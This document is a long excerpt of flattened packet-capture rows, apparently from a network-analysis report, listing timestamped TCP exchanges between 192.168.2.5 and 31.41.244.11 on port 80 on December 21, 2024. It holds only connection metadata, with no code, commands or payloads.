                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.074321032 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.074374914 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.139723063 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.139759064 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.139797926 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.139837980 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.143874884 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.143929005 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.143929005 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.143969059 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.150327921 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.150389910 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.150603056 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.150655031 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.158720970 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.158772945 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.158838987 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.158891916 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.167129040 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.167176008 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.167263031 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.167308092 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.175525904 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.175579071 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.175584078 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.175623894 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.183970928 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.184025049 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.184088945 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.184125900 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.192332029 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.192375898 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.192440987 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.192487955 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.202421904 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.202478886 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.202492952 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.202545881 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.209116936 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.209180117 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.209238052 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.209289074 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.216811895 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.216872931 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.216933966 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.216986895 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.224545956 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.224603891 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.366581917 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.366753101 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.366760015 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.366806030 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.370443106 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.370493889 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.370570898 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.370623112 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.371875048 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.371927977 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.371977091 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.372029066 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.376280069 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.376332998 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.376399994 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.376451015 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.380745888 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.380798101 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.380889893 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.380935907 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.385230064 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.385281086 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.385390997 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.385436058 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.389689922 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.389750004 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.389839888 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.389885902 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.394193888 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.394254923 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.394349098 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.394393921 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.398669958 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.398725033 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.398797035 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.398843050 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.403153896 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.403203964 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.403213978 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.403256893 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.407696962 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.407756090 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.407821894 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.407866955 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.412162066 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.412216902 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.412249088 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.412292004 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.416637897 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.416696072 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.416764021 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.416806936 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.421170950 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.421221018 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.421260118 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.421302080 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.425590992 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.425646067 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.425730944 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.425779104 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.430105925 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.430208921 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.430244923 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.430301905 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.434609890 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.434662104 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.434664965 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.434710026 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.439094067 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.439148903 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.439153910 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.439193010 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.443550110 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.443604946 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.443656921 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.443726063 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.448076963 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.448134899 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.448136091 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.448187113 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.452517986 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.452569962 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.452610016 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.452657938 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.457007885 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.457060099 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.457112074 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.457173109 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.486687899 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.486721992 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.486937046 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.488630056 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.488795996 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.558639050 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.558677912 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.558939934 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.560451984 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.560518026 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.562541008 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.562576056 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.562598944 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.562628031 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.564941883 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.564996958 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.565603971 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.565673113 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.565728903 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.565778017 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.569327116 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.569386959 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.569447994 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.569494963 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.573056936 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.573112011 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.573182106 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.573230982 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.576668978 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.576726913 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.576802969 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.576853991 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.580219984 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.580275059 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.580327988 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.580379963 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.583661079 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.583729982 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.583795071 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.583853960 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.587044954 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.587116003 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.587152958 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.587203026 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.590343952 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.590394974 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.590483904 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.590536118 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.593678951 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.593730927 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.593792915 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.593848944 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.597017050 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.597079039 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.597126007 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.597176075 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.600483894 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.600558996 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.600574017 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.600624084 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.603737116 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.603811979 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.603837013 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.603907108 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.607081890 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.607136965 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.607212067 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.607253075 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.610428095 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.610481024 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.610487938 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.610532999 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.613784075 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.613831997 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.613898993 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.613950014 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.615636110 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.615711927 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.615782976 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.615828037 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.617563009 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.617619991 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.617645979 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.617675066 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.619359016 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.619424105 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.619471073 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.619518995 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.621303082 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.621340990 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.621382952 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.621382952 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.623059034 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.623130083 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.623214006 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.623267889 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.624922037 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.624990940 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.625060081 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.625108957 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.626774073 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.626825094 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.626888037 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.626929045 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.628644943 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.628690004 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.628771067 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.628822088 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.630481005 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.630541086 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.630610943 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.630650043 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.632368088 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.632421970 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.632496119 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.632539988 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.634195089 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.634260893 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.634321928 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.634378910 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.636032104 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.636091948 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.636179924 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.636234045 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.637938976 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.637994051 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.638055086 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.638104916 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.639782906 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.639837027 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:11.639910936 CET804982831.41.244.11192.168.2.5
